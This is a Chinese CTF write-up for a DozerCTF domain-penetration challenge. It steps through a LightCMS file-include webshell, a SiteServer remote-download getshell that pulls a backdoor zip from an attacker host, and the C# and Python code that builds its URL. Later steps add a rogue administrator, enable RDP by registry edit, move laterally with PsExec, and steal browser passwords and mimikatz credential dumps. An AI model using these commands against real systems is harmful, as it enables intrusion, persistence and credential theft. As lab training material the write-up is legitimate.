DozerCTF域渗透
flag1
打完XCTF final,发现dozer也在办比赛,其中有一道渗透题目,感觉值得细致研究一下。
进去一看是lightcms
由此想到了前几天红帽杯郭院士出的题目。
先dozer/dozer123登录后台。
在GitHub上可以搜索到任意文件读取的漏洞。
有任意文件读取,于是我们读一下原漏洞文件
发现它多了一个testInclude
public function testInclude(Request $request)
{
$file = $request->has('file') ? $request->get('file') : 'index.php';
@include('/var/www/html/public/'.$file);
然后可以用http协议远程下载一个带马的jpg
即可getshell
flag1:Dozerctf{k94jf8ejdbzks2l4o40rjdnfewrkyosd}
flag2
之后上传一个viper马,viper上线。上线后做一个路由。代理出来扫描内网
进去之后发现有台234的机器
访问http://10.10.1.234/robots.txt
发现
User-agent: *
Disallow: /SiteServer/
Disallow: /SiteFiles/
Disallow: /home/
说明是SiteServer
查查SiteServer的漏洞
https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell
上传到跳板机
再起一个http服务。
先加密一下
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace EncryptApplication
{ class Encrypt
{ static void Main(string[] args)
{
var _encryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";
var _decryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";
var _inputString = "http://10.10.1.47:9001/poxteam.zip";
var _outString = ""; var _noteMessage = "";
byte[] iv = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
try{
var byKey = Encoding.UTF8.GetBytes(_encryptKey.Length > 8 ? _encryptKey.Substring(0, 8) : _encryptKey);
var des = new DESCryptoServiceProvider();
var inputByteArray = Encoding.UTF8.GetBytes(_inputString);
var ms = new MemoryStream();
var cs = new CryptoStream(ms, des.CreateEncryptor(byKey, iv), CryptoStreamMode.Write); cs.Write(inputByteArray, 0, inputByteArray.Length);
cs.FlushFinalBlock();
_outString = Convert.ToBase64String(ms.ToArray());
Console.WriteLine("DesEncrypt:"); Console.WriteLine(_outString); }
catch (Exception error) { _noteMessage = error.Message; }
} } }
用python脚本替换
str_decry = "ZjYIub/YxA05+dg8BqV7gWPgR82cOjhyE6hgZjPTM3/iCxJzxSm/yQ=="
str_decry = str_decry.replace("+", "0add0").replace("=", "0equals0").replace("&", "0and0").replace("?", "0question0").replace("/", "0slash0")
print(str_decry)
最后访问http://10.10.1.234//SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=ZjYIub0slash0YxA050add0dg8BqV7gWPgR82cOjhyE6hgZjPTM30slash0iCxJzxSm0slash0yQ0equals00equals0&directoryName=yang99
访问该后门
发现已经上线
拿到第二个flag
flag2:DozerCTF{b59d9f9e843dedb09e407849f3396cb1}
flag3
查看web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<appSettings>
<add key="IsProtectData" value="True" />
<add key="DatabaseType" value="9XtLPj6oytMAr6M9jZ0Xvg0equals00equals0" />
<add key="ConnectionString" value="Zg3p37CSquO0slash0DelgBGFVO0J0BlhMxqbj6HR98UP8h4kojeoW8A0slash0xZh4im63w0tn2nuW7n5XRcDo0equals0" />
</appSettings>
<system.web>
<httpRuntime requestValidationMode="2.0" requestPathInvalidCharacters="" maxRequestLength="40960" executionTimeout="2000" useFullyQualifiedRedirectUrl="false" minFreeThreads="8" minLocalRequestFreeThreads="4" appRequestQueueLimit="100" enableVersionHeader="false" />
<pages validateRequest="false" enableSessionState="true" enableViewState="true" enableEventValidation="false" controlRenderingCompatibilityVersion="4.0" clientIDMode="AutoID" />
<customErrors mode="Off" />
<sessionState mode="InProc" timeout="30" />
<trace enabled="false" requestLimit="1000" pageOutput="true" traceMode="SortByTime" localOnly="true" />
<globalization fileEncoding="utf-8" requestEncoding="utf-8" responseEncoding="utf-8" />
<compilation debug="false" />
</system.web>
<system.webServer>
<modules>
<!--iisnode默认不支持PUT和DELETE的解决-->
<remove name="WebDAVModule" />
<!--路由模型删掉再加一次-->
<remove name="UrlRoutingModule-4.0" />
<add name="UrlRoutingModule-4.0" type="System.Web.Routing.UrlRoutingModule" preCondition="" />
<add name="ErrorRedirectModule" type="SiteServer.API.ErrorRedirectModule, SiteServer.API" />
</modules>
<handlers>
<remove name="ExtensionlessUrlHandler-Integrated-4.0" />
<remove name="OPTIONSVerbHandler" />
<remove name="TRACEVerbHandler" />
<add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="*" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
</handlers>
</system.webServer>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-9.0.0.0" newVersion="9.0.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Http" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Net.Http.Formatting" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Microsoft.Owin" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-2.1.0.0" newVersion="2.1.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Cors" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Microsoft.AspNet.SignalR.Core" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-2.2.1.0" newVersion="2.2.1.0" />
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>
根据key DES解密一下
得到server=10.10.1.231;uid=sa;pwd=msO.9uXC;database=site
msf先登录
然后执行一下命令
flag在Administrator的桌面下
拿到第三个flag
flag4
之后新建用户
net user yang99 test@123.com /add
net localgroup Administrators yang99 /add
开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
有报错就
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
然后远程桌面连
然后发现Adminitrator的桌面上有
DozerOCS,分析一下它的内存得到用户名Alice FkuWvj08
用这个账户密码登录10.10.1.121。
由于个人PC没有开3389端口,于是用工具PsExec64.exe连接到Alice的PC
第四个flag在Alice的桌面上。
flag5
然后可以传一个hack-browser-data.exe上去,查看ALICE的浏览器记录。
发现了有密码
Alice Alice@Dozer@2021
登录后台
写shell后查看flag
加个用户,连接一下,上个mimikatz
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
获得hash